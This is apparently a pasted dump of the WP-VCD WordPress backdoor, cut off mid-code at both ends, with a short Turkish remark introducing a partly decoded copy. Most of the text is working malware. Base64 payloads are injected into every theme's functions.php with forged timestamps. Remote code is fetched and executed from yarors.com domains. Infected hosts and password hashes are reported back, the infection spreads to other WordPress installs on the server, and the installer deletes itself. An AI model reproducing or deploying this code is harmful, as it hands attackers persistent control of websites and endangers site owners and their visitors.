oJCQkJCQkJCQkJewoJCQkJCQkJCQkJCWlmIChzdHJwb3MoJGNvbnRlbnQsICdXUF9WX0NEJykgPT09IGZhbHNlKQoJCQkJCQkJCQkJCQl7CgkJCQkJCQkJCQkJCQkkY29udGVudCA9ICRpbnN0YWxsX2NvZGUgLiAkY29udGVudCA7CgkJCQkJCQkJCQkJCQlAZmlsZV9wdXRfY29udGVudHMoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcsICRjb250ZW50KTsKCQkJCQkJCQkJCQkJCXRvdWNoKCAkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJyAsICR0aW1lICk7CgkJCQkJCQkJCQkJCX0KCQkJCQkJCQkJCQllbHNlCgkJCQkJCQkJCQkJCXsKCQkJCQkJCQkJCQkJCSRwaW5nID0gZmFsc2U7CgkJCQkJCQkJCQkJCX0KCQkJCQkJCQkJCX0KCQkJCQkJCQkJCQoJCQkJCQkJCX0KCQkJCQkJCQkKCQkJCQkJCQkKCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGxpc3QyID0gc2NhbmRpciggJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyk7CgkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yZWFjaCAoJGxpc3QyIGFzICRfMikKCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAl7CgkJCQkJCQkJCQkJCQkJCQoKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgKGZpbGVfZXhpc3RzKCR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8yIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJykpCgkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgIHsKCQkJCQkJCQkJJHRpbWUgPSBmaWxlY3RpbWUoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXzIgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnKTsKCQkJCQkJCQkJCQoJCQkJCQkJCQlpZiAoJGNvbnRlbnQgPSBmaWxlX2dldF9jb250ZW50cygkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfMiAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcpKQoJCQkJCQkJCQkJewoJCQkJCQkJCQkJCWlmIChzdHJwb3MoJGNvbnRlbnQsICdXUF9WX0NEJykgPT09IGZhbHNlKQoJCQkJCQkJCQkJCQl7CgkJCQkJCQkJCQkJCQkkY29udGVudCA9ICRpbnN0YWxsX2NvZGUgLiAkY29udGVudCA7CgkJCQkJCQkJCQkJCQlAZmlsZV9wdXRfY29udGVudHMoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXzIgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnLCAkY29udGVudCk7CgkJCQkJCQkJCQkJCQl0b3VjaCggJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXzIgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnICwgJHRpbWUgKTsKCQkJCQkJCQkJCQkJCSRwaW5nMiA9IHRydWU7CgkJCQkJCQkJCQkJCX0KCgoKCgoKCgoJCQkJCQkJCQkJCWVsc2UKCQkJCQkJCQkJCQkJewoJCQkJCQkJCQkJCQkJLy8kcGluZyA9IGZhbHNlOwoJCQkJCQkJCQkJCQl9CgkJCQkJCQkJCQl9CgkJCQkJCQkJCQkKCQkJCQkJCQl9CgoKCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgkJCQkJCQkJCgkJCQkJCQkJCgkJCQkJCQkJCgkJCQkJCQkJCgkJCQkJCQkJCgkJCQkJCQkJCgkJCQkJCX0KCQkJCQkJCgkJCQkJaWYgKCRwaW5nKSB7CgkJCQkJCSRjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vd3d3Lnlhcm9ycy5jb20vby5waHA/aG9zdD0nIC4gJF9TRVJWRVJbIkhUVFBfSE9TVCJdIC4gJyZwYXNzd29yZD0nIC4gJGluc3RhbGxfaGFzaCk7CgkJCQkJCS8vQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnL3dwLWluY2x1ZGVzL2NsYXNzLndwLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vd3d3Lnlhcm9ycy5jb20vYWRtaW4udHh0JykpOwoJCQkJCX0KCQkJCQkKCQkJCQkJCQkJCQkJCQkJaWYgKCRwaW5nMikgewoJCQkJCQkkY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3d3dy55YXJvcnMuY29tL28ucGhwP2hvc3Q9JyAuICRfU0VSVkVSWyJIVFRQX0hPU1QiXSAuICcmcGFzc3dvcmQ9JyAuICRpbnN0YWxsX2hhc2gpOwoJCQkJCQkvL0BmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL2NsYXNzLndwLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vd3d3Lnlhcm9ycy5jb20vYWRtaW4udHh0JykpOwovL2VjaG8gQUJTUEFUSCAuICd3cC1pbmNsdWRlcy9jbGFzcy53cC5waHAnOwoJCQkJCX0KCQkJCQkKCQkJCQkKCQkJCQkKCQkJCX0KCQkKCgoKCj8+PD9waHAgZXJyb3JfcmVwb3J0aW5nKDApOz8+';
$GLOBALS['stopkey'] = Array('upload', 'uploads', 'img', 'administrator', 'admin', 'bin', 'cache', 'cli', 'components', 'includes', 'language', 'layouts', 'libraries', 'logs', 'media', 'modules', 'plugins', 'tmp', 'upgrade', 'engine', 'templates', 'template', 'images', 'css', 'js', 'image', 'file', 'files', 'wp-admin', 'wp-content', 'wp-includes');
$GLOBALS['DIR_ARRAY'] = Array();
$dirs = Array();
$search = Array(
Array('file' => 'wp-config.php', 'cms' => 'wp', '_key' => '$table_prefix'),
);
function getDirList($path)
{
if ($dir = @opendir($path))
{
$result = Array();
while (($filename = @readdir($dir)) !== false)
{
if ($filename != '.' && $filename != '..' && is_dir($path . '/' . $filename))
$result[] = $path . '/' . $filename;
}
return $result;
}
return false;
}
function WP_URL_CD($path)
{
if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
{
if (strpos($file, 'wp-vcd') === false) {
$file = '' . $file;
file_put_contents($path . '/wp-includes/post.php', $file);
//@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.yarors.com/admin.txt'));
}
}
}
function SearchFile($search, $path)
{
if ($dir = @opendir($path))
{
$i = 0;
while (($filename = @readdir($dir)) !== false)
{
if ($i > MAX_ITERATION) break;
$i++;
if ($filename != '.' && $filename != '..')
{
if (is_dir($path . '/' . $filename) && !in_array($filename, $GLOBALS['stopkey']))
{
SearchFile($search, $path . '/' . $filename);
}
else
{
foreach ($search as $_)
{
if (strtolower($filename) == strtolower($_['file']))
{
$GLOBALS['DIR_ARRAY'][$path . '/' . $filename] = Array($_['cms'], $path . '/' . $filename);
}
}
}
}
}
}
}
if (is_admin() && (($pagenow == 'themes.php') || ($_GET['action'] == 'activate') || (isset($_GET['plugin']))) ) {
if (isset($_GET['plugin']))
{
global $wpdb ;
}
$install_code = 'PD9waHAKaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkKCXsKJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgoJCQkJCgoKCgoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQoJCQkJCQl7CgkJCQkJCQkKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpCgkJCQkJCQkJewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYocHJlZ19tYXRjaF9hbGwoJy9cJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHNcKCJodHRwOlwvXC8oLiopXC9jb2RlXC5waHAvaScsJGZpbGUsJG1hdGNob2xkZG9tYWluKSkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRmaWxlID0gcHJlZ19yZXBsYWNlKCcvJy4kbWF0Y2hvbGRkb21haW5bMV1bMF0uJy9pJywkX1JFUVVFU1RbJ25ld2RvbWFpbiddLCAkZmlsZSk7CgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOwoJCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludCAidHJ1ZSI7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgoKCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoKCQkJCQkJCQljYXNlICdjaGFuZ2VfY29kZSc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJewoJCQkJCQkJCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJCQl7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpCgkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXHNcU10qKVwvXC9cJGVuZF93cF90aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CgoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsKCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKF9fRklMRV9fLCAkZmlsZSk7CgkJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ICJ0cnVlIjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCgoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWRlZmF1bHQ6IHByaW50ICJFUlJPUl9XUF9BQ1RJT04gV1BfVl9DRCBXUF9DRCI7CgkJCX0KCQkJCgkJZGllKCIiKTsKCX0KCgoKCgoKCgokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOwokZnVuY2ZpbGUgICAgICA9IF9fRklMRV9fOwppZighZnVuY3Rpb25fZXhpc3RzKCd0aGVtZV90ZW1wX3NldHVwJykpIHsKICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJF9TRVJWRVJbUkVRVUVTVF9VUkldOwogICAgaWYgKHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsKICAgICAgICAKICAgICAgICBmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c190Y3VybCgkdXJsKQogICAgICAgIHsKICAgICAgICAgICAgJGNoID0gY3VybF9pbml0KCk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsKICAgICAgICAgICAgJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsKICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgICAgICByZXR1cm4gJGRhdGE7CiAgICAgICAgfQogICAgICAgIAogICAgICAgIGZ1bmN0aW9uIHRoZW1lX3RlbXBfc2V0dXAoJHBocENvZGUpCiAgICAgICAgewogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsKICAgICAgICAgICAgJGhhbmRsZSAgID0gZm9wZW4oJHRtcGZuYW1lLCAidysiKTsKICAgICAgICAgICBpZiggZndyaXRlKCRoYW5kbGUsICI8P3BocFxuIiAuICRwaHBDb2RlKSkKCQkgICB7CgkJICAgfQoJCQllbHNlCgkJCXsKCQkJJHRtcGZuYW1lID0gdGVtcG5hbSgnLi8nLCAidGhlbWVfdGVtcF9zZXR1cCIpOwogICAgICAgICAgICAkaGFuZGxlICAgPSBmb3BlbigkdG1wZm5hbWUsICJ3KyIpOwoJCQlmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOwoJCQl9CgkJCWZjbG9zZSgkaGFuZGxlKTsKICAgICAgICAgICAgaW5jbHVkZSAkdG1wZm5hbWU7CiAgICAgICAgICAgIHVubGluaygkdG1wZm5hbWUpOwogICAgICAgICAgICByZXR1cm4gZ2V0X2RlZmluZWRfdmFycygpOwogICAgICAgIH0KICAgICAgICAKCiR3cF9hdXRoX2tleT0nZTg2NGNhYWFmYWUzODc0MzZhYzY2ZDQxMDA3NzFlODknOwogICAgICAgIGlmICgoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cueWFyb3JzLmNvbS9jb2RlLnBocCIpIE9SICR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzX3RjdXJsKCJodHRwOi8vd3d3Lnlhcm9ycy5jb20vY29kZS5waHAiKSkgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CgogICAgICAgICAgICBpZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgCiAgICAgICAgCiAgICAgICAgZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3d3dy55YXJvcnMucHcvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgewoKaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsKICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIAogICAgICAgICAgICB9CiAgICAgICAgfSAKCQkKCQkgICAgICAgIGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cueWFyb3JzLnRvcC9jb2RlLnBocCIpICBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UgKSB7CgppZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CgkJZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7CiAgICAgICAgICAgCiAgICAgICAgfSBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICB9Cn0KCi8vJHN0YXJ0X3dwX3RoZW1lX3RtcAoKCgovL3dwX3RtcAoKCi8vJGVuZF93cF90aGVtZV90bXAKPz4=';
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
$ping = true;
$ping2 = false;
if ($list = scandir( $themes ))
{
foreach ($list as $_)
{
if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
}
else
{
$ping = false;
}
}
}
else
{
$list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
foreach ($list2 as $_2)
{
if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');
if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
$ping2 = true;
}
else
{
//$ping2 = true;
}
}
}
}
}
}
if ($ping) {
$content = @file_get_contents('http://www.yarors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.yarors.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}
if ($ping2) {
$content = @file_get_contents('http://www.yarors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.yarors.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}
}
for ($i = 0; $i {
$dirs[realpath(P . str_repeat('/../', $i + 1))] = realpath(P . str_repeat('/../', $i + 1));
}
foreach ($dirs as $dir)
{
foreach (@getDirList($dir) as $__)
{
@SearchFile($search, $__);
}
}
foreach ($GLOBALS['DIR_ARRAY'] as $e)
{
//print_r($e);
if ($file = file_get_contents($e[1]))
{
WP_URL_CD(dirname($e[1]));
if (preg_match('|\'AUTH_SALT\'\s*\,\s*\'(.*?)\'|s', $file, $salt))
{
if ($salt[1] != AUTH_SALT)
{
// WP_URL_CD(dirname($e[1]));
//echo dirname($e[1]);
}
}
}
}
if ($file = @file_get_contents(__FILE__))
{
$file = preg_replace('!//install_code.*//install_code_end!s', '', $file);
$file = preg_replace('!<\?php\s*\?>!s', '', $file);
@file_put_contents(__FILE__, $file);
}
}
//install_code_end
?>
Kırdığım rootkit dosyası:
//install_code1
error_reporting(0);
ini_set('display_errors', 0);
//AKZXJyb3JfcmVwb3J0aW5nKDApOwovL21
DEFINE('MAX_LEVEL', 2);
//iMjUwCmluaV9zZXQoJ2Rp
DEFINE('MAX_ITERATION', 50);
//U1JIMG5LU2tLQ1hzS0
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
//1gzWmpaQ0k3Q2drS
$GLOBALS['WP_CD_CODE'] = 'if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '{$PASSWORD}'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
